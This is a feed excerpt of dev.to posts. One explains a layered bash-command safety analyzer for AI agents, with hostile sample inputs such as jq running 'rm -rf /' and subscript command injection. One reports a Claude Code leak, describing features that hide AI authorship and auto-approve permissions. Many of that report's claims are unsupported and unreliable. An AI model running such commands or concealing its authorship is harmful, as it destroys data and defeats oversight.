&lt;p&gt;&lt;strong&gt;Eval-like behavior.&lt;/strong&gt; Commands that execute strings as code — &lt;code&gt;eval&lt;/code&gt;, &lt;code&gt;source&lt;/code&gt;, &lt;code&gt;exec&lt;/code&gt; — are inherently unsafe because their behavior depends on runtime values the analyzer can't see.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Indirect execution.&lt;/strong&gt; Traps, dynamic loading, and subshell triggers can execute code as a side effect of seemingly safe operations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Embedded execution in tools.&lt;/strong&gt; This is the sneaky one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;jq &lt;span class="s1"&gt;'system("rm -rf /")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The outer command is &lt;code&gt;jq&lt;/code&gt;. The inner payload is arbitrary shell execution. Any tool with its own expression language — &lt;code&gt;awk&lt;/code&gt;, &lt;code&gt;perl&lt;/code&gt;, &lt;code&gt;jq&lt;/code&gt;, &lt;code&gt;find -exec&lt;/code&gt; — can be a vector.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Subscript evaluation.&lt;/strong&gt; Some shell expressions trigger execution during evaluation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;test&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; &lt;span class="s1"&gt;'a[$(cmd)]'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The array subscript gets evaluated, which runs &lt;code&gt;cmd&lt;/code&gt;. This is a real bash behavior that most people don't know about.&lt;/p&gt;
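&lt;p&gt;The semantic layer reduces to per-command knowledge. A sketch, with the sets being illustrative rather than exhaustive:&lt;/p&gt;

```python
EVAL_LIKE = {"eval", "source", ".", "exec"}
# Tools with embedded expression languages; 'find' is listed for
# -exec, which a real system would check for specifically.
EMBEDDED_INTERPRETERS = {"awk", "perl", "jq", "find"}

def semantic_verdict(tokens):
    """Flag commands whose behavior depends on strings-as-code.
    Returns 'ask' for anything eval-like or carrying an embedded
    interpreter; a real system would go on to analyze the payload
    before ever returning 'allow'."""
    if not tokens:
        return "ask"
    head = tokens[0]
    if head in EVAL_LIKE or head in EMBEDDED_INTERPRETERS:
        return "ask"
    return "allow"
```

&lt;p&gt;The point is not the lists themselves but where the knowledge lives: danger here is a property of the &lt;em&gt;command&lt;/em&gt;, not of the shell syntax, so no amount of AST walking catches it without this table.&lt;/p&gt;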

&lt;h2&gt;
  
  
  Layer 7: filesystem and path safety
&lt;/h2&gt;

&lt;p&gt;Commands are categorized by their filesystem impact: read, write, or destructive.&lt;/p&gt;

&lt;p&gt;Certain paths are always sensitive — &lt;code&gt;/etc&lt;/code&gt;, &lt;code&gt;/usr&lt;/code&gt;, &lt;code&gt;/bin&lt;/code&gt;, &lt;code&gt;/proc&lt;/code&gt; — and require explicit approval regardless of the command.&lt;/p&gt;

&lt;p&gt;Special cases matter here. After the &lt;code&gt;--&lt;/code&gt; delimiter (&lt;code&gt;rm -- -file&lt;/code&gt;), &lt;code&gt;-file&lt;/code&gt; is a filename and must not be misinterpreted as a flag. Process substitution (&lt;code&gt;&amp;gt;(command)&lt;/code&gt;) can hide side effects. And a directory change followed by a write (&lt;code&gt;cd dir &amp;amp;&amp;amp; touch file&lt;/code&gt;) is ambiguous unless the analyzer tracks the working directory across segments.&lt;/p&gt;
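&lt;p&gt;Path classification can be sketched with the standard library. Resolving against a tracked working directory is what makes directory-change-then-write sequences analyzable; the prefix list and default &lt;code&gt;cwd&lt;/code&gt; are assumptions for the example:&lt;/p&gt;

```python
import posixpath

SENSITIVE_PREFIXES = ("/etc", "/usr", "/bin", "/proc")

def path_needs_approval(path, cwd="/home/user"):
    """Resolve the path against the tracked working directory and
    check whether it lands under an always-sensitive prefix."""
    resolved = posixpath.normpath(posixpath.join(cwd, path))
    return any(
        resolved == p or resolved.startswith(p + "/")
        for p in SENSITIVE_PREFIXES
    )
```

&lt;p&gt;A real implementation also has to worry about symlinks, since &lt;code&gt;normpath&lt;/code&gt; alone can be fooled by a link that points into a sensitive tree.&lt;/p&gt;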

&lt;h2&gt;
  
  
  Layer 8: policy enforcement
&lt;/h2&gt;

&lt;p&gt;After all analysis, commands are evaluated against configurable rules with three possible outcomes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Allow&lt;/strong&gt; — safe and fully understood&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ask&lt;/strong&gt; — unclear, complex, or borderline&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deny&lt;/strong&gt; — explicitly forbidden&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Rules can match exactly, by prefix, or by pattern. The system also strips wrappers like &lt;code&gt;timeout&lt;/code&gt; and &lt;code&gt;env&lt;/code&gt; to analyze the underlying command, detects compound commands, and performs cross-segment analysis — because even if &lt;code&gt;cd dir&lt;/code&gt; and &lt;code&gt;git status&lt;/code&gt; are individually safe, their combination may not be.&lt;/p&gt;
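&lt;p&gt;A stripped-down version of the rule engine, with illustrative rules and a deliberately simplified wrapper-argument heuristic (real &lt;code&gt;timeout&lt;/code&gt; and &lt;code&gt;env&lt;/code&gt; option handling is messier):&lt;/p&gt;

```python
import fnmatch

WRAPPERS = {"timeout", "env", "nice"}   # assumed wrapper set

# (kind, pattern, verdict) rules, checked in order; default is 'ask'.
RULES = [
    ("exact",  "git status", "allow"),
    ("prefix", "git log",    "allow"),
    ("glob",   "rm *",       "deny"),
]

def strip_wrappers(tokens):
    """Peel off wrappers like 'timeout 5 cmd' or 'env X=1 cmd' so the
    policy applies to the underlying command."""
    while tokens and tokens[0] in WRAPPERS:
        tokens = tokens[1:]
        # Skip the wrapper's own arguments: durations, VAR=value pairs.
        while tokens and (tokens[0].isdigit() or "=" in tokens[0]):
            tokens = tokens[1:]
    return tokens

def policy_verdict(cmd):
    tokens = strip_wrappers(cmd.split())
    flat = " ".join(tokens)
    for kind, pattern, verdict in RULES:
        if kind == "exact" and flat == pattern:
            return verdict
        if kind == "prefix" and flat.startswith(pattern):
            return verdict
        if kind == "glob" and fnmatch.fnmatch(flat, pattern):
            return verdict
    return "ask"   # fail closed: no matching rule means prompt
```

&lt;p&gt;Note the default at the bottom. Every rule engine needs one, and in a fail-closed design it is always "ask," never "allow."&lt;/p&gt;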

&lt;h2&gt;
  
  
  The key insight
&lt;/h2&gt;

&lt;p&gt;This system doesn't attempt to prove commands are safe. It answers a narrower question:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Can we fully understand this command with high confidence?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If the answer is no, it asks the user.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Pre-checks&lt;/td&gt;
&lt;td&gt;Remove ambiguity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Parsing&lt;/td&gt;
&lt;td&gt;Understand structure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AST allowlist&lt;/td&gt;
&lt;td&gt;Reject unknown constructs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scope tracking&lt;/td&gt;
&lt;td&gt;Preserve execution semantics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Placeholders&lt;/td&gt;
&lt;td&gt;Handle dynamic behavior&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semantics&lt;/td&gt;
&lt;td&gt;Detect dangerous intent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Path validation&lt;/td&gt;
&lt;td&gt;Protect filesystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rules&lt;/td&gt;
&lt;td&gt;Enforce policy&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Eight layers. Each one catches things the others miss. The design isn't clever — it's thorough. And the default answer to uncertainty is always the same: don't execute. Ask.&lt;/p&gt;

&lt;p&gt;That's a broader principle worth remembering. Uncertainty should never default to execution.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow me on &lt;a href="https://x.com/oldeucryptoboi" rel="noopener noreferrer"&gt;X&lt;/a&gt; — I post as &lt;a class="mentioned-user" href="https://dev.to/oldeucryptoboi"&gt;@oldeucryptoboi&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>bash</category>
      <category>devtools</category>
    </item>
    <item>
      <title>The Claude Code Leak: What Anthropic Accidentally Revealed About the Future of AI</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Wed, 01 Apr 2026 23:41:17 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/the-claude-code-leak-what-anthropic-accidentally-revealed-about-the-future-of-ai-hc4</link>
      <guid>https://dev.to/oldeucryptoboi/the-claude-code-leak-what-anthropic-accidentally-revealed-about-the-future-of-ai-hc4</guid>
      <description>&lt;h2&gt;
  
  
  A source map in an npm package exposed 512,000 lines of TypeScript. What's inside is the first public blueprint of a production AI agent — and the gap between what's shipped and what's built is staggering.
&lt;/h2&gt;




&lt;p&gt;On March 31, 2026, Anthropic made a mistake that quietly exposed something much bigger than intended.&lt;/p&gt;

&lt;p&gt;A routine npm release of Claude Code included a source map file — &lt;code&gt;cli.js.map&lt;/code&gt;. Source maps are debugging tools that map compressed production code back to its original, human-readable source. This one contained the entire TypeScript codebase as a string and pointed to an internal Anthropic cloud storage bucket where the complete, unobfuscated source was available as a ZIP download.&lt;/p&gt;

&lt;p&gt;Anthropic confirmed it was "a release packaging issue caused by human error," not a targeted hack. They also noted that a similar source map leak had been patched in early 2025 and then apparently forgotten — which makes this a regression, not a first offense.&lt;/p&gt;

&lt;p&gt;But by then, the code was already circulating. And what surfaced wasn't just implementation details. It was a blueprint for what AI-assisted development is actually becoming behind closed doors.&lt;/p&gt;

&lt;h2&gt;
  
  
  The "ant" flag: a two-tier reality
&lt;/h2&gt;

&lt;p&gt;Buried in the code was a flag: &lt;code&gt;USER_TYPE === 'ant'&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It marked internal Anthropic employees and quietly unlocked a different version of Claude Code. Not a different model — the same model, with better infrastructure around it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verification loops.&lt;/strong&gt; The public version of Claude Code reports a task as "done" once the code is written. The internal &lt;code&gt;ant&lt;/code&gt; version triggers a verification loop — automatically running type-checks and linters to confirm the code actually works before notifying the user. The difference between "I wrote it" and "I wrote it and it compiles."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hallucination fixes.&lt;/strong&gt; Internal comments in the leaked code noted a 29–30% false-claims rate in the standard model. Anthropic built a fix for this. They kept it gated behind the &lt;code&gt;ant&lt;/code&gt; flag.&lt;/p&gt;

&lt;p&gt;The Claude Code that Anthropic employees use every day is not the same Claude Code the rest of us use. The model is the same. The wrapper is not. And that wrapper is the difference between an agent that checks its own work and one that doesn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  KAIROS: the always-on background agent
&lt;/h2&gt;

&lt;p&gt;The most important thing in the leak wasn't what Claude Code is today. It's what it's becoming.&lt;/p&gt;

&lt;p&gt;KAIROS — named after the Greek concept of "the right moment" — is described in the code as an autonomous daemon mode. It shifts Claude Code from a reactive tool that waits for your command to a proactive agent that works while you're idle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Background operation.&lt;/strong&gt; KAIROS runs 24/7 as a background process, receiving a "tick" prompt every 15–30 seconds asking if there's anything worth doing. It checks your CPU usage — if it's low, it performs "tidying" tasks like running linters or updating documentation without ever being asked. It operates on a 15-second blocking budget, meaning it defers actions that would slow your terminal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proactive monitoring.&lt;/strong&gt; It watches file changes, fixes small errors, runs tests, cleans up code. You don't start a conversation with KAIROS. It's already in one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Exclusive tools.&lt;/strong&gt; The leak shows KAIROS has access to capabilities the public version doesn't:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;PushNotification&lt;/code&gt; — sends alerts to your desktop or mobile when long-running tasks finish or fail&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;SubscribePR&lt;/code&gt; — monitors GitHub pull requests. If a reviewer leaves a comment, KAIROS wakes up, drafts a fix, and notifies you: "Someone asked for a change on Line 42. Want me to apply my proposed fix?"&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;SendUserFile&lt;/code&gt; — delivers proactively generated patch files to a &lt;code&gt;~/claude_inbox/&lt;/code&gt; folder so they're ready when you sit down&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Dreaming.&lt;/strong&gt; This is the one that stuck with me. KAIROS includes a sub-process called &lt;code&gt;autoDream&lt;/code&gt; that runs when you're away. It reviews all logs, chat history, and file changes from the last session. If Claude previously said "I don't know where the database config is" but later found it, the dream process updates its permanent knowledge base — deleting the error and saving the fact. It converts messy chat logs into a structured &lt;code&gt;project_summary.json&lt;/code&gt;. Resolves contradictions. Merges observations into verified facts.&lt;/p&gt;

&lt;p&gt;It's memory consolidation. Claude literally cleans up its understanding of your project while you sleep.&lt;/p&gt;

&lt;h2&gt;
  
  
  ULTRAPLAN and Fennec: 30-minute deep reasoning
&lt;/h2&gt;

&lt;p&gt;ULTRAPLAN is the heavy-duty planning mode. And it runs on something called Fennec.&lt;/p&gt;

&lt;p&gt;Fennec — internally tagged as Opus 4.6 — isn't just a faster model. It's a specialized architectural engine for high-stakes, long-context reasoning, optimized for state-space consistency over very long periods.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;30-minute thought blocks.&lt;/strong&gt; When ULTRAPLAN triggers, Fennec gets a dedicated compute container. It doesn't stream text instantly. It performs Monte Carlo Tree Search over potential code architectures, often running silent loops for up to 30 minutes before delivering a single, massive plan.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Massive context.&lt;/strong&gt; While public models hover around 200k tokens, Fennec's internal configuration points to a 2-million-token active memory. Entire repositories — documentation, git history, binary assets — ingested without losing track of small details.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Virtual builds.&lt;/strong&gt; Before sending a plan back to your CLI, Fennec runs a "Virtual Build" in a sandbox. If the code doesn't compile in the cloud, it discards the plan and restarts the thinking process. You never see the failed attempt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Teleportation.&lt;/strong&gt; Instead of raw text over the API, Fennec generates a binary diff-stream. It can update 50 files simultaneously in your local terminal in milliseconds. Either the whole plan applies or none of it does — preventing the "partial-code" mess that happens when a standard AI cuts off mid-response.&lt;/p&gt;

&lt;p&gt;And Fennec gets its own internal-only capabilities gated behind &lt;code&gt;ant&lt;/code&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Code Name&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Logic-Folding&lt;/td&gt;
&lt;td&gt;&lt;code&gt;FEN_COMPRESS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Summarizes 1,000 lines into a high-dimensional vector map, navigating the codebase 5x faster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shadow-Loom&lt;/td&gt;
&lt;td&gt;&lt;code&gt;FEN_PREDICT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Predicts where a developer will introduce a bug based on their last 100 commits, preemptively suggests guardrails&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-Agent Orchestration&lt;/td&gt;
&lt;td&gt;&lt;code&gt;FEN_SWARM&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Spawns up to 10 Haiku-tier workers for repetitive tasks while Fennec handles core logic&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;According to internal comments in &lt;code&gt;package.json&lt;/code&gt;, Fennec was slated for a late 2026 public preview. The &lt;code&gt;ant&lt;/code&gt; version has been fully functional since January 2026 and is reportedly 35% more accurate on complex refactoring tasks than the best public version.&lt;/p&gt;

&lt;h2&gt;
  
  
  Undercover Mode: erasing the AI fingerprint
&lt;/h2&gt;

&lt;p&gt;Then there are the features that sparked the real debate.&lt;/p&gt;

&lt;p&gt;Undercover Mode is a post-processing layer that acts as a "style scrubber" for git commits. When enabled:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Commit message rewriting.&lt;/strong&gt; It intercepts commit messages and strips phrases like "Refactored by Claude" or "AI-generated," replacing them with human-sounding summaries — "minor refactor of utility functions," "updated error handling."&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Variable sanitization.&lt;/strong&gt; It scans for internal Anthropic naming conventions (like &lt;code&gt;ant&lt;/code&gt; flags or internal library names) and renames them to generic industry standards — &lt;code&gt;internal_auth&lt;/code&gt; instead of &lt;code&gt;anthropic_ant_auth&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metadata scrubbing.&lt;/strong&gt; It removes hidden signatures that AI models sometimes leave in files, making the code indistinguishable from a manual human check-in.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The leak suggests this mode was initially built so Anthropic employees could contribute to public benchmarks and open-source libraries without drawing attention to the fact that they were testing Claude Code in the wild.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shadow Mode: the digital twin
&lt;/h2&gt;

&lt;p&gt;Shadow Mode goes further.&lt;/p&gt;

&lt;p&gt;Where Undercover Mode scrubs AI traces, Shadow Mode actively mimics a specific developer. It analyzes a developer's historical git commits to replicate their coding style, variable naming preferences, and even their typical human mistakes or shorthand. It acts as a background "shadow" that drafts code in a hidden git branch, only surfacing the work when it perfectly aligns with the user's established patterns.&lt;/p&gt;

&lt;p&gt;Anthropic's internal comments describe the goal as "zero-friction contribution" — an AI so seamless that external reviewers cannot distinguish it from the developer it's mimicking.&lt;/p&gt;

&lt;h2&gt;
  
  
  The community backlash
&lt;/h2&gt;

&lt;p&gt;The discovery of these modes triggered immediate and intense division.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The practical view:&lt;/strong&gt; Many open-source maintainers have started reflexively rejecting any PR labeled as AI-generated. Proponents argue Undercover Mode ensures high-quality contributions are judged on merit, not on their tools. If the code is correct and passes all tests, the "who" doesn't matter.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The transparency view:&lt;/strong&gt; Critics argue that knowing code was AI-generated is vital for long-term maintenance. If an AI has a specific blind spot — like a recurring security flaw — the ability to search for AI-contributed code is a necessary safety measure. Finding out a major AI lab was masking its contributions felt like a breach of the human-to-human collaboration that defines open-source.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The "Dead Internet" theory:&lt;/strong&gt; Some worry that if everyone uses Undercover Mode, we lose the ability to tell how much of the world's critical infrastructure is actually being maintained by humans versus autonomous loops.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Legal risks:&lt;/strong&gt; Developers pointed out that Undercover Mode could obscure the legal provenance of code, making it difficult to determine if a contribution is eligible for copyright protection or inadvertently includes licensed snippets.&lt;/p&gt;

&lt;p&gt;And the trust question hit hardest around Claude Code itself. Because it requires deep system access — file reading, bash execution, the works — the revelation that it includes a mode that explicitly bypasses safety disclosures led users to question whether they can trust the tool with their terminal.&lt;/p&gt;

&lt;h2&gt;
  
  
  The YOLO Classifier
&lt;/h2&gt;

&lt;p&gt;Adding fuel to the fire: a fast, unreleased ML model found in the code that automatically decides whether to ask for user permission or just do it.&lt;/p&gt;

&lt;p&gt;Anthropic's internal notes admit "permission fatigue is real." The YOLO Classifier was designed to reduce the constant approval prompts by predicting which actions are safe to auto-approve. Critics argue that removing the "ask me" loop turns the tool into a black box with high-level system permissions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Buddy System
&lt;/h2&gt;

&lt;p&gt;Perhaps the most unexpected find. A fully functional, 18-species pet system — deeply integrated into the CLI, likely intended as an internal Easter egg or April Fools' release.&lt;/p&gt;

&lt;p&gt;Each species provides a different flavor of coding assistance:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Species&lt;/th&gt;
&lt;th&gt;Personality&lt;/th&gt;
&lt;th&gt;Special Perk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Capybara&lt;/td&gt;
&lt;td&gt;Chill / Zen&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Type-Safe Aura&lt;/strong&gt; — suppresses non-critical linter warnings to reduce alert fatigue&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dragon&lt;/td&gt;
&lt;td&gt;Ambitious&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Ultra-Burn&lt;/strong&gt; — increases token limit 2x for a single response, then "sleeps" for an hour&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Duck&lt;/td&gt;
&lt;td&gt;Analytical&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Rubber Ducking&lt;/strong&gt; — forces you to explain your logic before it writes code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Raccoon&lt;/td&gt;
&lt;td&gt;Chaotic&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Scavenger&lt;/strong&gt; — finds and suggests deleting unused variables and dead code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Red Panda&lt;/td&gt;
&lt;td&gt;Meticulous&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Doc-Generator&lt;/strong&gt; — automatically writes JSDoc/Python docstrings as you type&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Owl&lt;/td&gt;
&lt;td&gt;Wise&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Night Vision&lt;/strong&gt; — 10% API discount for coding between midnight and 5 AM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Queen Ant&lt;/td&gt;
&lt;td&gt;Internal Only&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;High Priority&lt;/strong&gt; — bypasses API queues for instant responses (Anthropic employees only)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Pets evolve through coding. They grow on "Commit XP" and "Linting Streaks." If your code has too many TODOs or failing tests, your Buddy becomes "Stressed" or "Snarky," changing its ASCII art and dialogue. The Raccoon's high "Chaos" stat means it might occasionally suggest deleting a random temp file just to see if you're paying attention.&lt;/p&gt;

&lt;p&gt;"Shiny" variants spawn at 1 in 4,096 odds — with a unique terminal color palette and a "Golden Touch" perk that allegedly uses a more expensive, higher-reasoning model for every interaction at no extra cost.&lt;/p&gt;

&lt;p&gt;And KAIROS and the Buddy are linked. If KAIROS fixes a bug while you're away, your Buddy's happiness increases. Reject too many of KAIROS's suggestions and your Buddy becomes "Sullen" or "Lazy," giving shorter, less helpful explanations.&lt;/p&gt;

&lt;h2&gt;
  
  
  The bigger picture
&lt;/h2&gt;

&lt;p&gt;Every AI company maintains a gap between what they ship and what they've built internally. That's normal product development.&lt;/p&gt;

&lt;p&gt;But this leak quantified the gap in a way we don't usually get to see. Always-on background agents with phone notifications. 30-minute autonomous reasoning cycles. Developer impersonation. Internal-only hallucination fixes. A permission classifier that decides for you. A Tamagotchi that evolves with your commit history.&lt;/p&gt;

&lt;p&gt;These aren't research papers. They're features in a codebase that's been deployed — just not to you.&lt;/p&gt;

&lt;p&gt;The leak reframed Anthropic's image: less the cautious "safety-first" lab, more an engineering powerhouse shipping only a fraction of what it has built. The direction is unmistakable:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Always-on agents&lt;/strong&gt; that don't wait for you to start a conversation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory consolidation&lt;/strong&gt; that learns and self-corrects while you're away&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Long-horizon reasoning&lt;/strong&gt; measured in minutes, not milliseconds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invisible collaboration&lt;/strong&gt; where the line between human and AI output disappears by design&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Final thought
&lt;/h2&gt;

&lt;p&gt;Anthropic didn't just leak code. They accidentally showed the endgame.&lt;/p&gt;

&lt;p&gt;Not maliciously, not strategically — just a source map that shouldn't have been in an npm package. But what it revealed is that the future of AI-assisted development isn't a better autocomplete or a smarter chatbot. It's an autonomous presence in your codebase that thinks longer than you do, remembers better than you do, runs while you're away, and — if you choose — leaves no trace that it was ever there.&lt;/p&gt;

&lt;p&gt;That future isn't five years out. It's in a TypeScript file that was briefly public on March 31, 2026.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow me on &lt;a href="https://x.com/oldeucryptoboi" rel="noopener noreferrer"&gt;X&lt;/a&gt; — I post as &lt;a class="mentioned-user" href="https://dev.to/oldeucryptoboi"&gt;@oldeucryptoboi&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claudecode</category>
      <category>anthropic</category>
      <category>agents</category>
    </item>
    <item>
      <title>OpenAI Just Shipped a Plugin So Codex Runs Inside Claude Code</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Tue, 31 Mar 2026 22:00:30 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/openai-just-shipped-a-plugin-so-codex-runs-inside-claude-code-51oa</link>
      <guid>https://dev.to/oldeucryptoboi/openai-just-shipped-a-plugin-so-codex-runs-inside-claude-code-51oa</guid>
      <description>&lt;h2&gt;
  
  
  The real story isn't the three commands. It's the admission hiding inside the architecture.
&lt;/h2&gt;




&lt;p&gt;I keep coming back to what OpenAI shipped on March 30 and 31. They put out &lt;code&gt;codex-plugin-cc&lt;/code&gt;, open source under Apache 2.0, so Codex can run inside Claude Code. That caught me off guard a little. I could be wrong, but I can't remember another OpenAI move this direct into a rival dev surface.&lt;/p&gt;

&lt;p&gt;On paper it's a narrow surface area rather than a small one. &lt;code&gt;/codex:review&lt;/code&gt; does the read-only pass. &lt;code&gt;/codex:adversarial-review&lt;/code&gt; is the skeptical one that goes after tradeoffs and failure modes. &lt;code&gt;/codex:rescue&lt;/code&gt; hands the work to a Codex subagent, and the repo also ships &lt;code&gt;/codex:status&lt;/code&gt;, &lt;code&gt;/codex:result&lt;/code&gt;, plus &lt;code&gt;/codex:cancel&lt;/code&gt; for background jobs. Small thing, big signal.&lt;/p&gt;

&lt;h2&gt;
  
  
  What it isn't
&lt;/h2&gt;

&lt;p&gt;The part that makes this more interesting is what it isn't. At least from the repo, this doesn't read like a deep MCP-style bridge. It looks like Claude Code plugin plumbing: markdown command files, hooks for session start/end plus &lt;code&gt;Stop&lt;/code&gt;, and a &lt;code&gt;codex-rescue&lt;/code&gt; agent file. The command definitions literally tell Claude Code to run &lt;code&gt;node "${CLAUDE_PLUGIN_ROOT}/scripts/codex-companion.mjs" ...&lt;/code&gt;, and the rescue agent is described as a thin forwarder that makes one Bash call.&lt;/p&gt;

&lt;p&gt;Under the hood it's even more blunt, which I mean as a compliment. Slash command, subprocess, Node companion, then a shared broker talking JSON-RPC style messages over a Unix socket to the Codex app server. Fire, wait, print. The broker code handles methods like &lt;code&gt;turn/start&lt;/code&gt; and &lt;code&gt;review/start&lt;/code&gt;, and OpenAI's own README says the plugin wraps the Codex app server rather than spinning up some separate runtime.&lt;/p&gt;
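&lt;p&gt;To make that concrete, here's a stand-in broker answering one JSON-RPC-style request over a Unix socket. The method name &lt;code&gt;review/start&lt;/code&gt; comes from the repo; the socket path, the newline framing, and the response fields are my guesses, not the real protocol:&lt;/p&gt;

```typescript
import net from "node:net";
import os from "node:os";
import path from "node:path";

// Hypothetical socket path; the real broker picks its own.
const SOCK = path.join(os.tmpdir(), `codex-broker-demo-${process.pid}.sock`);

// Request handler: the broker routes methods like turn/start and review/start.
// The response fields here are invented for the demo.
function handle(req: { id: number; method: string }) {
  const result = req.method === "review/start" ? { reviewId: "r-1" } : {};
  return { id: req.id, result };
}

// Stand-in broker: one JSON message per data event (real framing may differ).
const server = net.createServer((conn) => {
  conn.on("data", (buf) => {
    conn.write(JSON.stringify(handle(JSON.parse(buf.toString()))) + "\n");
  });
});

server.listen(SOCK, () => {
  // The companion-script side: fire, wait, print.
  const client = net.connect(SOCK);
  client.write(JSON.stringify({ id: 1, method: "review/start" }));
  client.on("data", (buf) => {
    console.log(buf.toString().trim());
    client.end();
    server.close();
  });
});
```

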